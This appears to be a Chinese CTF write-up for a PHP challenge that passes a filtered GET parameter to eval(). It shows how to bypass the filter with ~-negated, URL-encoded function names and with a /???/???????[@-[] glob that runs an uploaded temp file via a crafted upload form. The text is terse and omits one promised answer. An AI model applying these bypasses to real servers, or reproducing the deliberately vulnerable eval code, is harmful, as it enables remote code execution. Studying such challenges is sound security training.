<?php
if(isset($_GET['code'])){$code = $_GET['code'];if(strlen($code)>35){die("Long.");}if(preg_match("/[A-Za-z0-9_$]+/",$code)){die("NO.");}eval($code);
}else{highlight_file(__FILE__);
}
限制:
1.webshell长度不超过35
2.正则过滤掉了数字字母还有$和_
php7环境:
取反
php中’~‘表示取反,而取反之后大都是不可见字符
<?php
var_dump(urlencode(~'system'));
取反后的值为%8C%86%8C%8B%9A%92
解码:
<?php
var_dump(urlencode(~'phpinfo'));
答案如下:
php5环境:
通配符
用通配符来进行匹配,无法准确匹配
但我们要继续通配符
[^a]表示这里不为a
[0-9]表示0-9这个范围
而注意到linux中文件基本都是小写,我们上传的文件中后几位是随机的,可能包含大写,所以我们就只需要利用[]表示出大写字母就可以了
在ascii表中,大写字母处于@-[之间,所以很明确了,使用/???/???????[@-[]来进行匹配
执行:
<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Document</title>
</head>
<body><form action="web.php" method="post" enctype="multipart/form-data"><input type="file" name="file" id=""><input type="submit" value="submit"></form>
</body>
</html>
写一个form表单上传文件到web.php,使用bp抓包,抓一个上传文件的包和web.php的包
把第一个包的post内容放入web.php中
发送请求
结束